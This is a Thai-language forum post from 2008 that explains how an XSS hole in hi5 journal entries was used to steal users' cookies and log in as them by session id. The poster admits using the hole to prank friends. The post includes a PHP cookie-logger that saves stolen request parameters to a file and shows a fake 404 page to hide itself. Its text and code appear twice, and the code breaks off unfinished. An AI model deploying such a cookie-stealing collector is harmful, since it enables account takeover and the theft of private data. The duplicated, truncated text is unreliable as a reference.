tonhor
20-04-2008, 05:54 PM
ูวิธีที่ hacker ใช้ช่องโหว่ของ hi5 จาก journal entry
ซึ่งตรงนี้หลายๆคนที่ใช้ javascript ในการตกแต่ง hi5 ก็รู้อยู่แล้ว
วิธีใส่ javascript ก็ดูจากเวปนี้ http://www.zone-it.com/31603 (ทั้ง IE&firefox)
แต่เมื่อวันที่ 18 เมษ 2551 ช่วงเย็นๆ hi5 ได้ทำการบล็อคช่องโหว่นี้ (เพราะตอนเช้าผมยังลองใช้แกล้งเพื่อนอยู่เลย)
เนื่องจากมีผู้ที่ใช้ ในทางที่ไม่ดี สามารถหาข้อมูลส่วนตัวของผู้ใช้(หรือ cookie)
และยังสามารถ Sign In เป็นชื่อผู้ใช้คนอื่นโดยไม่ต้องรู้รหัสผ่านด้วย sid
มาดูวิธีของ เขากัน...
[hide=30]1.เขียน php script เพื่อเอาไว้รันและเก็บ ข้อมูล cookie ของ user
[code]<?php
$fp = fopen('./cookie.txt', 'a');
fwrite ($fp, print_r($_GET, 1) . "\n");
fclose ($fp);
echo "<H2>HTTP 404 Page Not Found.<H2>"
ซึ่งตรงนี้หลายๆคนที่ใช้ javascript ในการตกแต่ง hi5 ก็รู้อยู่แล้ว
วิธีใส่ javascript ก็ดูจากเวปนี้ http://www.zone-it.com/31603 (ทั้ง IE&firefox)
แต่เมื่อวันที่ 18 เมษ 2551 ช่วงเย็นๆ hi5 ได้ทำการบล็อคช่องโหว่นี้ (เพราะตอนเช้าผมยังลองใช้แกล้งเพื่อนอยู่เลย)
เนื่องจากมีผู้ที่ใช้ ในทางที่ไม่ดี สามารถหาข้อมูลส่วนตัวของผู้ใช้(หรือ cookie)
และยังสามารถ Sign In เป็นชื่อผู้ใช้คนอื่นโดยไม่ต้องรู้รหัสผ่านด้วย sid
มาดูวิธีของ เขากัน...
[hide=30]1.เขียน php script เพื่อเอาไว้รันและเก็บ ข้อมูล cookie ของ user
[code]<?php
$fp = fopen('./cookie.txt', 'a');
fwrite ($fp, print_r($_GET, 1) . "\n");
fclose ($fp);
echo "<H2>HTTP 404 Page Not Found.<H2>"